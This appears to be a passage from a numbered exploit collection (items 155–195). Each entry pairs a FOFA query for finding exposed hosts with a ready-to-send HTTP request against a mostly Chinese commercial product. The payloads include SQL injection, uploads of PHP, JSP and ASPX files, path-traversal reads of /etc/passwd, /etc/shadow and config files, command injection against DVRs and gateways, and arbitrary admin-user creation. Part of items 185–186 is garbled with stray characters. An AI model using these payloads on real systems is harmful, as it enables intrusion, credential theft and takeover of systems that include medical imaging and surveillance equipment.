Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
· TBK DVR-4104
· TBK DVR-4216

curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"

POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

Uploaded file path: http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")

POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

Uploaded file path: /1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 (smart parking fee system) Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"

Step 1: upload the file. The <fileName> field sets the file name and the <fileFlow> field carries the file content, which must be base64-encoded.

POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

Uploaded file path: http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 (multimedia information publishing system) QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"

POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

Uploaded file path: http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 (distribution management system) ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"

POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"

POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

Uploaded file path: http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"

URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 (ticketing management platform) SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"

POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (Lean Value Management System) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"

GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"

GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"

GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"

POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA: body="/808gps/"

GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"

GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"

POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"

GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"

GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system (电信网关配置管理系统) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"

POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"

POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

Uploaded file path:
GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 (engineering management system) arbitrary file read

POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"

GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 (enterprise standardization management system) UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"

POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 (enterprise standardization management system) AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"

POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Interlib library cluster management system) updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"

GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
FOFA: server="SunFull-Webs"

POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 (REALOR application virtualization system) SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"

GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

, ^0 ^2 u5 t. }0 h, \4 f8 R1 Y: e186. F-logic DataCube3 SQL注入0 C1 C* Z: t! O/ W
CVE-2024-31750
4 @  t" u# r& _" hF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
0 C) [" @7 d* A( a7 A& CFOFA:title=="DataCube3"- U! c3 J) m. O9 i& [' ?% S: V- @, A
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
4 ?- p) p3 e* y" S; v( Q4 XHost: your-ip/ p$ W4 \. J) f7 S5 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0. b2 G0 s( |- O% }6 P" J/ P2 @, m6 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8( |' Z' P& o9 k2 M. O( L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ \  Y& P9 I" ?0 l6 s4 o
Accept-Encoding: gzip, deflate
- U: L2 K- D9 H, E& _& yConnection: close
% c' P( I5 S( [; d# g9 p( mContent-Type: application/x-www-form-urlencoded7 ^9 ^" U6 h" P' i

4 t) }: _/ s5 ~, preq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=14502 s' _4 z% ~- @' O0 m. z! y1 K9 _
8 B5 j, D( k0 [, U9 c

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"

POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 attachment 任意文件读取
- A3 I% `: L% ]) E8 ~5 h. vversion <= 3.9.75 Z* {4 S( E8 g! v
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 Clinical Browsing System deleteStudy SQL Injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (Short Video Matrix Marketing System) poihuoqu Arbitrary File Read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 Electronic Document Security Management System NavigationAjax SQL Injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr Arbitrary File Upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 云鉴 Security Management System setsystemtimeaction Command Execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet Arbitrary File Upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi Command Execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
